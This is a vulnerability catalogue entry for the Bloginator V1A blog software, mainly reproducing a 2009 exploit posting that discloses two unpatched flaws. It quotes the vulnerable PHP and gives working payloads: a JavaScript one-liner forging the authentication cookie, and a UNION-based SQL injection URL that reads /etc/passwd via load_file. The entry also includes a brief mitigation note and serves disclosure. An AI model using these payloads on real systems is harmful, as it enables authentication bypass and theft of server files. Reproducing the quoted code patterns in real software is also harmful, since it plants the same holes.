Insicure Cookie Handling & SQL Injection

vendor:

Bloginator

by:

FireShot, Jacopo Vuga

8.8

CVSS

HIGH

Insicure Cookie Handling & SQL Injection

264, 89

CWE

Product Name: Bloginator

Affected Version From: V1A

Affected Version To: V1A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Insicure Cookie Handling & SQL Injection

The first vulnerability is an insecure cookie handling vulnerability which allows an attacker to set a cookie with the value 'you are identified' and gain access to the application. The second vulnerability is a SQL injection vulnerability which allows an attacker to inject arbitrary SQL code in the query.

Mitigation:

Ensure that cookies are set with the secure flag and that user input is properly sanitized before being used in a SQL query.

Source

Exploit-DB raw data:

##########################################################################

Author = FireShot , Jacopo Vuga.
Mail = fireshot<at>autistici<dot>org

Software = Bloginator V1A
Download = http://kamads.com/kamads_ads/download.php?email=bloginator&ID=0

Greets to = Osirys, Myral, str0ke

###########################################################################

Vulnerability = Insicure Cookie Handling

###########################################################################

[CODE]

[URL] www.site.com/bloginator/articleCall.php

global $name,$password,$returnLink;
$p_name = strip_tags(substr($_POST['name'],0,32));
$p_password = strip_tags(substr($_POST['password'],0,32));
if(crypt($p_name , $name) == $name and crypt($p_password,$password) == $password )
 {

           setcookie("identifyYourself","you are identified");
           print "Login successfull<br>";
           print $returnLink;
       }
   else {print "Wrong username or password";
   }
}

[/CODE]


[EXPLOIT]

javascript:document.cookie = "identifyYourself=you+are+identified; path=/";

[/EXPLOIT]

############################################################################

Vulnerability = SQL injection

############################################################################

[CODE]

[URL] www.site.com/bloginator/articleCall.php

$action = @$_GET['action'];
[...]
$id = $_GET['id'];
[...]
function editArticle($id,$message)
{
global $returnLink;
$query = "select * FROM articles WHERE id='$id'";
$sql = mysql_query($query) or die(mysql_query());
$title = mysql_result($sql,0,'title');
$title = htmlentities($title);
$article = mysql_result($sql,0,'article');
$article = htmlentities($article);
$link = mysql_result($sql,0,'link');
$link = htmlentities($link);

startHTML("Edit ID # ".$id);
?>

[/CODE]

[EXPLOIT]

As Admin (Post Cookie exploit) you can inj arbitrary SQL code in the query.

www.site.com/action=edit&id=fireshot' union select 1,2,3,4,load_file('/etc/passwd'),6,7 order by '*

[/EXPLOIT]

############################################################################## 

# milw0rm.com [2009-03-19]